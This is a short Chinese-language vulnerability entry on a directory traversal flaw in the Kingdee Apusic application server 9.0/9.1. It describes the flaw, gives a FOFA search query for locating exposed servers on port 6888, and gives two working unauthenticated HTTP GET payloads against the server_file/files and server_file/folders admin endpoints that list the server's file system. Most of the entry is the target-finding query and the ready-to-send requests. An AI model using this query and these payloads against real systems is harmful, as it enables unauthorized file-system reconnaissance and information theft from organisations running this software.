J17-6金蝶-Apusic应用服务器-目录遍历
漏洞描述:
由于金蝶Apusic应用服务器 /admin/protected/selector/server_file/files、/admin/protected/selector/server_file/folders 等接口没有进行校验和过滤,直接将参数拼接到文件操作中,导致出现目录遍历漏洞,未经身份验证的远程攻击者可通过此漏洞读取系统内部系统文件路径及信息,导致信息泄露,系统处于极不安全状态。
影响版本:
Apusic_port = 6888
Apusic_version = 9.0、9.1
网站图片:
网络测绘:
fofa语法:
(body=“easSessionId” || header=“easportal” || header=“eassso/login” || banner=“eassso/login” || body=“/eassso/common” || (title=“EAS系统登录” && body=“金蝶”) || header=“EASSESSIONID” || banner=“EASSESSIONID”) && port=“6888”
漏洞复现:
payload:
GET /admin/protected/selector/server_file/files?folder=/ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.712.36 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close
效果图:
poc-2
GET /admin/protected/selector/server_file/folders?parent=/ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.712.36 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close